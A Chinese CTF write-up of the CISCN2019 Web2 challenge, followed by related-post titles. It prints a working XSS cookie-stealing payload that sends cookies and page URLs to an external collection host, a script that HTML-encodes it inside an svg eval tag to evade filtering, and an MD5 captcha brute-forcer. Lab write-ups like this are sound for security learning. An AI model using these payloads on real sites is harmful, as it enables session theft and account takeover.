2. 程式人生 > 其它 >[CISCN2019 華東北賽區]Web2刷題筆記

[CISCN2019 華東北賽區]Web2刷題筆記

阿新 發佈:2022-02-05
無摘要

最近的學習時間大部分用在了新東西上面,只靠刷刷freebuf偶爾刷道ctf題來溫一溫之前的方向了

題目登陸註冊後可以發表投稿和反饋,提供了xss平臺

存在admin.php頁面需要身份認證才能訪問

思路:投稿帶有xss程式碼,反饋去讓管理員訪問,打到管理員cookie進入admin.php

xss平臺原始碼

(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch
 
(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch
 
(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

將(new Image()).src改為window.location.href,把新建影象的函式改為直接跳轉

直接交平臺給出來的會被過濾,用html編碼進行繞過,利用svg標籤,eval執行程式碼

html編碼並生成payload指令碼

words="(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
re=""
for c in words:
    re+="&#"+str(ord(c))

print("<svg><script>eval"+re+"</script>")

提交後拿到頁面的url到反饋頁面提交

需要驗證碼md5前六位為固定值,指令碼爆破即可

import hashlib

for i in range(1,10000000000):
    md = hashlib.md5(str(i).encode("utf-8")).hexdigest()
    if md[0:6]=='6a1b6f':
        print(i)

提交成功後拿到管理員cookie,攜帶後訪問admin.php

最簡單的聯合注入拿flag

相關推薦

[CISCN2019 東北賽區]Web2筆記

無摘要 最近的學習時間大部分用在了新東西上面,只靠刷刷freebuf偶爾道ctf來溫一溫之前的方向了

BUU XSS COURSE 1 & [CISCN2019 東北賽區]Web2

BUU XSS COURSE 1 & [CISCN2019 東北賽區]Web2 XSS的題目沒怎麼做過,比賽基本上也沒有(=_=),總結下今天做的兩

[CISCN2019 東北賽區]Web2 WriteUp

[CISCN2019 華東北賽區]Web2 WriteUp 前言一.開啟環境二.構造XSS程式碼 前言 這是一道xss結合sql注入的題目,當時在寫的時候想了很久,最後看大佬的題解覺得不太適合我這樣的新手來看,於是心血來潮想寫

[CISCN2019 東南賽區]Web4

解題思路 開啟有一個連結,那先點選一下 發現url處,很像命令執行,試一試。發現無論是什麼都是no response,又是各種嘗試

臥槽!為工程師總結的5000頁Java、LeetCode筆記提供下載,太優秀了!

本文轉自公眾號:碼農突圍,本文已經過作者授權,如需轉載,請聯絡碼農突圍公號。

leetcode筆記四十六 全排列

leetcode筆記四十六 全排列 源地址:46. 全排列 問題描述: 給定一個 沒有重複 數字的序列,返回其所有可能的全排列。

leetcode筆記五十三 最大子序和

leetcode筆記五十三 最大子序和 源地址:53. 最大子序和 問題描述: 給定一個整數陣列 nums ,找到一個具有最大和的連續子陣列(子陣列最少包含一個元素),返回其最大和。

leetcode筆記五十四 螺旋矩陣

leetcode筆記五十四 螺旋矩陣 源地址:54. 螺旋矩陣 問題描述: 給定一個包含 m x n 個元素的矩陣(m 行, n 列),請按照順時針螺旋順序,返回矩陣中的所有元素。

leetcode筆記五十八 最後一個單詞的長度

leetcode筆記五十八 最後一個單詞的長度 源地址:58. 最後一個單詞的長度 問題描述:

leetcode筆記六十四 最小路徑和

leetcode筆記六十四 最小路徑和 源地址:64. 最小路徑和 問題描述: 給定一個包含非負整數的 m x n 網格,請找出一條從左上角到右下角的路徑,使得路徑上的數字總和為最小。

leetcode筆記六十五 有效數字

leetcode筆記六十五 有效數字 源地址:65. 有效數字 問題描述: 驗證給定的字串是否可以解釋為十進位制數字。

[CISCN2019 東南賽區]Double Secret

0x01 進入頁面如下 提示我們尋找secret,再加上題目的提示,猜測這裡有secret頁面,我們嘗試訪問,結果如下

leetcode筆記七十二 編輯距離

leetcode筆記七十二 編輯距離 源地址:72. 編輯距離 問題描述: 給你兩個單詞 word1 和 word2,請你計算出將 word1 轉換成 word2 所使用的最少運算元 。

leetcode筆記七十四 搜尋二維陣列

leetcode筆記七十四 搜尋二維陣列 源地址:74. 搜尋二維矩陣 問題描述: 編寫一個高效的演算法來判斷 m x n 矩陣中,是否存在一個目標值。該矩陣具有如下特性:

leetcode筆記七十六 最小覆蓋子串

leetcode筆記七十六 最小覆蓋子串 源地址:76. 最小覆蓋子串 問題描述: 給你一個字串 S、一個字串 T,請在字串 S 裡面找出:包含 T 所有字元的最小子串。

leetcode筆記七十九 單詞搜尋

leetcode筆記七十九 單詞搜尋 源地址:79. 單詞搜尋 問題描述: 給定一個二維網格和一個單詞,找出該單詞是否存在於網格中。

筆記」AC自動機

Keywords Research 板子,同luoguP3808,不過是多測。 然後多測不清空,\\(MLE\\)兩行淚。

leetcode筆記八十二 刪除排序連結串列中的重複元素 II

leetcode筆記八十二 刪除排序連結串列中的重複元素 II 源地址:82. 刪除排序連結串列中的重複元素 II

筆記」二分圖匹配

板子 兩種寫法:(核心思想是一樣的,使用時實測並沒有什麼區別 兩個引數版(洛谷題解

筆記」Tarjan

貼一個講得非常詳細的\\(tarjan\\)入門教程 資訊傳遞 講個笑話:我之前用並查集求最小環過的這,然後看見題目上有個\\(tarjan\\)標籤